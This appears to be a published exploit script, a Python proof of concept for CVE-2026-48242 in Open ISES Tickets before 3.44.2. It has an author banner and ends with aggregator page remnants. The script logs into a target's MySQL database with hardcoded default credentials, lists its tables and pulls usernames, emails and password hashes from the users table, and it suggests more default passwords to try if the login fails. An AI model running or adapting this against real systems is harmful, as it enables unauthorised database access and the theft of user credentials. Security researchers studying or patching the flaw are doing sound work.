Open ISES Tickets < 3.44.2 - Hardcoded MySQL Credentials#!/usr/bin/env python3 # Exploit Title: Open ISES Tickets < 3.44.2 - Hardcoded MySQL Credentials # CVE: CVE-2026-48242 # Date: 2026-05-25 # Exploit Author: Mohammed Idrees Banyamer # Author Country: Jordan # Instagram: @banyamer_security # Author GitHub: https://github.com/mbanyamer # Vendor Homepage: https://github.com/openises/tickets # Software Link: https://github.com/openises/tickets # Affected: Open ISES Tickets < 3.44.2 # Tested on: Linux # Category: WebApp # Platform: PHP/MySQL # Exploit Type: Credential Access # CVSS: 9.1 # CWE : CWE-798 # Description: Open ISES Tickets contains hardcoded MySQL credentials in import functionality allowing unauthenticated database access. # Fixed in: 3.44.2 # Usage: python3 exploit.py <target> --lhost <your_ip> --lport <your_port> # # Examples: # python3 exploit.py 192.168.1.100 # # Options: # # Notes: # # How to Use # # Step 1: print(r""" ╔════════════════════════════════════════════════════════════════════════════════════════════╗ ║ ║ ║ ██████╗ █████╗ ███╗ ██╗██╗ ██╗ █████╗ ███╗ ███╗███████╗██████╗ ║ ║ ██╔══██╗██╔══██╗████╗ ██║╚██╗ ██╔╝██╔══██╗████╗ ████║██╔════╝██╔══██╗ ║ ║ ██████╔╝███████║██╔██╗ ██║ ╚████╔╝ ███████║██╔████╔██║█████╗ ██████╔╝ ║ ║ ██╔══██╗██╔══██║██║╚██╗██║ ╚██╔╝ ██╔══██║██║╚██╔╝██║██╔══╝ ██╔══██╗ ║ ║ ██████╔╝██║ ██║██║ ╚████║ ██║ ██║ ██║██║ ╚═╝ ██║███████╗██║ ██║ ║ ║ ╚═════╝ ╚═╝ ╚═╝╚═╝ ╚═══╝ ╚═╝ ╚═╝ ╚═╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝ ║ ║ ║ ║ [ b a n y a m e r _ s e c u r i t y ] ║ ║ ║ ║ ▸ Silent Hunter | Shadow Presence | Digital Intel ◂ ║ ║ ║ ║ Operator : Mohammed Idrees Banyamer • Jordan 🇯🇴 ║ ║ Handle : @banyamer_security ║ ║ ║ ║ Exploit : CVE-2026-48242 ║ ║ Target : Open ISES Tickets - Hardcoded MySQL Credentials ║ ║ ║ ║ Status : ACTIVE ║ ║ ║ ╚════════════════════════════════════════════════════════════════════════════════════════════╝ """) import sys import mysql.connector from mysql.connector import Error import argparse parser = argparse.ArgumentParser(description="CVE-2026-48242 PoC") parser.add_argument("target", help="Target hostname or IP") parser.add_argument("--port", type=int, default=3306, help="MySQL port") parser.add_argument("--user", default="root", help="MySQL username") parser.add_argument("--password", default="", help="MySQL password") parser.add_argument("--database", default="tickets", help="Database name") parser.add_argument("--lhost", help="Your IP (unused in this exploit)") parser.add_argument("--lport", type=int, help="Your port (unused in this exploit)") args = parser.parse_args() print("[+] Open ISES Tickets CVE-2026-48242 PoC") print(f"[+] Target: {args.target}:{args.port}") print(f"[+] Credentials: {args.user} / {args.password or '(empty)'}") print("-" * 70) try: connection = mysql.connector.connect( host=args.target, port=args.port, user=args.user, password=args.password, database=args.database, connect_timeout=10 ) if connection.is_connected(): print("[+] SUCCESS! Connected using hardcoded credentials!") cursor = connection.cursor() cursor.execute("SHOW TABLES") tables = cursor.fetchall() print(f"\n[+] Found {len(tables)} tables:") for table in tables: print(f" - {table[0]}") try: cursor.execute("SELECT username, email, password FROM users LIMIT 5") users = cursor.fetchall() if users: print(f"\n[+] Sample users:") for user in users: print(f" {user[0]} | {user[1]} | {user[2][:50]}...") except: pass cursor.close() connection.close() print("\n[+] Database access successful.") except Error as e: print(f"[-] Connection failed: {e}") print("[!] Try default credentials: root / (empty), root / tickets, etc.") sys.exit(1) except Exception as e: print(f"[-] Error: {e}") sys.exit(1) References:https://github.com/openises/tickets/releases/tag/v3.44.2 CVEs referencing this url https://github.com/openises/tickets/commit/ecfeb406a016766cae81c749e14b5145a9f2dbff
Thanks for you vote!
Thanks for you comment!
|
{{ x.nick }}
{{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1 {{ x.comment }} |
Back to Top
此内容由惯性聚合(RSS阅读器)自动聚合整理,仅供阅读参考。 原文来自 — 版权归原作者所有。